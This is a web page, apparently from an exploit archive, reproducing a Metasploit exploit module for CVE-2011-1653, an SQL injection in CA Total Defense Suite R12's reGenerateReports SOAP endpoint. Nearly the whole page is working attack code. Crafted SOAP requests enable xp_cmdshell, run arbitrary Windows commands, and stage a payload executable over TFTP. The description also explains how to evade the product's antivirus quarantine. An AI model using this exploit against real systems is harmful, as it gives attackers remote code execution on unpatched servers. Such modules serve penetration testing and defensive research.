扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 |
## # $Id: ca_totaldefense_regeneratereports.rb 13810 2011-10-02 17:03:23Z swtornio $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection', 'Description'=> %q{ This module exploits an sql injection flaw in CA Total Defense Suite R12. When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql statements into the ReportIDs element. NOTE: This module was tested against the MS SQL Server 2005 Express that's bundled with CA Total Defense Suite R12. CA's Total Defense Suite real-time protection will quarantine the default framework executable payload. Choosing an alternate exe template will bypass the quarantine. }, 'Author' => [ 'MC' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 13810 $', 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-134' ], [ 'OSVDB', '74968'], [ 'CVE', '2011-1653' ], ], 'Targets' => [ [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ] ], 'Privileged' => true, 'Platform' => 'win', 'DisclosureDate' => 'Apr 13 2011', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(34443), OptBool.new('SSL', [ true, 'Use SSL', true ]), OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ]) ], self.class) end def windows_stager exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") execute_cmdstager({ :temp => '.'}) @payload_exe = payload_exe print_status("Attempting to execute the payload...") execute_command(@payload_exe) end def execute_command(cmd, opts = {}) inject = [ "'') exec master.dbo.sp_configure 'show advanced options', 1;reconfigure;--", "'') exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure;--", "'') exec master.dbo.xp_cmdshell 'cmd.exe /c #{cmd}';--", ] inject.each do |sqli| soap = %Q|<?xml version="1.0" encoding="utf-8"?> <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:Body> <reGenerateReports xmlns="http://tempuri.org/"> <EnterpriseID>msf</EnterpriseID> <ReportIDs>#{sqli}</ReportIDs> <UserID>187</UserID> </reGenerateReports> </soap12:Body> </soap12:Envelope> | res = send_request_cgi( { 'uri' =>'/UNCWS/Management.asmx', 'method' => 'POST', 'version' => '1.0', 'ctype' => 'application/soap+xml; charset=utf-8', 'data' => soap, }, 5) if ( res and res.body =~ /SUCCESS/ ) #print_good("Executing command...") else raise RuntimeError, 'Something went wrong.' end end end def exploit if not datastore['CMD'].empty? print_status("Executing command '#{datastore['CMD']}'") execute_command(datastore['CMD']) return end case target['Platform'] when 'win' windows_stager else raise RuntimeError, 'Target not supported.' end handler end end __END__ POST /UNCWS/Management.asmx HTTP/1.1 Host: 192.168.31.129 Content-Type: application/soap+xml; charset=utf-8 Content-Length: length <?xml version="1.0" encoding="utf-8"?> <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:Body> <reGenerateReports xmlns="http://tempuri.org/"> <EnterpriseID>string</EnterpriseID> <ReportIDs>string</ReportIDs> <--boom!! <UserID>long</UserID> </reGenerateReports> </soap12:Body> </soap12:Envelope> |
体验盒子
